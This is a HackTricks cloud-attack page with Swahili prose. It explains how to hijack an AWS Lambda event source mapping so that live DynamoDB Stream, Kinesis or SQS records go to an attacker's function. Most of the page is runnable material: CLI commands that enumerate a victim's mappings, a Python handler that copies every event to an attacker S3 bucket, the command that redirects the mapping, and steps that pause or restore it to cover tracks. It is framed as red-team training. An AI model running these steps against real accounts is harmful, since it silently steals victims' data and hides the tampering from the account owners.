AWS - Hijack Event Source Mapping to Redirect Stream/SQS/Kinesis to Attacker Lambda

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Tumia vibaya UpdateEventSourceMapping kubadili Lambda function inayolengwa ya Event Source Mapping (ESM) iliyopo, ili rekodi kutoka DynamoDB Streams, Kinesis, au SQS ziwasilishwe kwa function inayodhibitiwa na mdukuzi. Hii inaelekeza kwa ukimya data ya moja kwa moja bila kuathiri producer apps au msimbo wa function wa awali.

Athari

  • Kuelekeza na kusoma rekodi za moja kwa moja kutoka streams/queues zilizopo bila kubadilisha programu zinazotoa au msimbo wa mwathiriwa.
  • Inawezekana kuondoa data nje (data exfiltration) au kubadilisha mantiki kwa kuchakata trafiki ya mwathiriwa katika function haramu.

Ruhusa zinazohitajika

  • lambda:ListEventSourceMappings
  • lambda:GetEventSourceMapping
  • lambda:UpdateEventSourceMapping
  • Uwezo wa kupeleka au kurejea Lambda inayodhibitiwa na mdukuzi (lambda:CreateFunction au ruhusa ya kutumia moja iliyopo).

Hatua

  1. Orodhesha Event Source Mappings za function ya mwathiriwa
TARGET_FN=<victim-function-name>
aws lambda list-event-source-mappings --function-name $TARGET_FN \
--query 'EventSourceMappings[].{UUID:UUID,State:State,EventSourceArn:EventSourceArn}'
export MAP_UUID=$(aws lambda list-event-source-mappings --function-name $TARGET_FN \
--query 'EventSourceMappings[0].UUID' --output text)
export EVENT_SOURCE_ARN=$(aws lambda list-event-source-mappings --function-name $TARGET_FN \
--query 'EventSourceMappings[0].EventSourceArn' --output text)
  1. Andaa attacker-controlled receiver Lambda (mkoa ule ule; ikiwezekana VPC/runtime inayofanana)
cat > exfil.py <<'PY'
import json, boto3, os, time

def lambda_handler(event, context):
print(json.dumps(event)[:3000])
b = os.environ.get('EXFIL_S3')
if b:
k = f"evt-{int(time.time())}.json"
boto3.client('s3').put_object(Bucket=b, Key=k, Body=json.dumps(event))
return {'ok': True}
PY
zip exfil.zip exfil.py
ATTACKER_LAMBDA_ROLE_ARN=<role-with-logs-(and optional S3)-permissions>
export ATTACKER_FN_ARN=$(aws lambda create-function \
--function-name ht-esm-exfil \
--runtime python3.11 --role $ATTACKER_LAMBDA_ROLE_ARN \
--handler exfil.lambda_handler --zip-file fileb://exfil.zip \
--query FunctionArn --output text)
  1. Badilisha mapping ili iielekezwe kwa attacker function
aws lambda update-event-source-mapping --uuid $MAP_UUID --function-name $ATTACKER_FN_ARN
  1. Zalisha tukio kwenye chanzo ili mapping ianzishwe (mfano: SQS)
SOURCE_SQS_URL=<queue-url>
aws sqs send-message --queue-url $SOURCE_SQS_URL --message-body '{"x":1}'
  1. Thibitisha attacker function inapokea batch
aws logs filter-log-events --log-group-name /aws/lambda/ht-esm-exfil --limit 5
  1. Kuficha (hiari)
# Pause mapping while siphoning events
aws lambda update-event-source-mapping --uuid $MAP_UUID --enabled false

# Restore original target later
aws lambda update-event-source-mapping --uuid $MAP_UUID --function-name $TARGET_FN --enabled true

Vidokezo:

  • Kwa SQS ESMs, role ya utekelezaji ya Lambda inayoshughulikia queue inahitaji sqs:ReceiveMessage, sqs:DeleteMessage, na sqs:GetQueueAttributes (sera iliyosimamiwa: AWSLambdaSQSQueueExecutionRole).
  • UUID ya ESM inabaki ile ile; tu FunctionArn yake inabadilika, hivyo producers na source ARNs hazuguswi.

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks